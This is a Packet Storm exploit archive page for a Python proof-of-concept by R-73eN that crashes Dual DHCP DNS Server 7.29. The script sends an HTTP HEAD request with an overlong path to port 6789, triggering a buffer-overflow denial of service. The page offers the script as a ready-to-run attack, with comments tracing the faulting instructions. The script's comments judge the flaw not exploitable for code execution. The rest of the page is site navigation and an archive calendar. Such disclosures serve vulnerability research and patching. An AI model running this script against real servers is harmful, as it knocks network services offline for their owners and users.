exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dual DHCP DNS Server 7.29 Denial Of Service

Dual DHCP DNS Server 7.29 Denial Of Service
Posted Dec 7, 2016
Authored by R-73eN

Dual DHCP DNS server version 7.29 buffer overflow denial of service exploit.

tags | exploit, denial of service, overflow
SHA-256 | aef327d15be4e3120dede8e6a1ff8991df10825bd4bf4bb2d57a9f6edd72237a

Dual DHCP DNS Server 7.29 Denial Of Service

Change Mirror Download
# Title :  Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)
# Date : 07/12/2016
# Author : R-73eN
# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
# Vendor : http://dhcp-dns-server.sourceforge.net/
# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
# Vulnerability Description:
# The software crashes when it tries to write to an invalid address.
#
# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
# MOV DWORD PTR SS:[ESP+4],31
# MOV DWORD PTR SS:[ESP],1
# .........................
# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.
#
# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe
# contains 00 which is a badchar in our case.
#

import socket
import time
import sys

banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner

host = ""
port = 6789

def send_request(host,port,data):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
s.send(data)
print "[+] Malicious Packet Sent [+]\n"

except Exception:
print "[+] Exploit failed . . .[+]\n"
s.close()



ebx = "BBBB"
eax = "CCCC"
evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400

if(len(sys.argv) < 1):
print '\n Usage : exploit.py ipaddress\n'
exit(0)
else:
host = sys.argv[1]

#The method doesn't really matters. It gets valideted only about the length
request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
send_request(host,port,request.replace("{REPLACE}",evil))

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close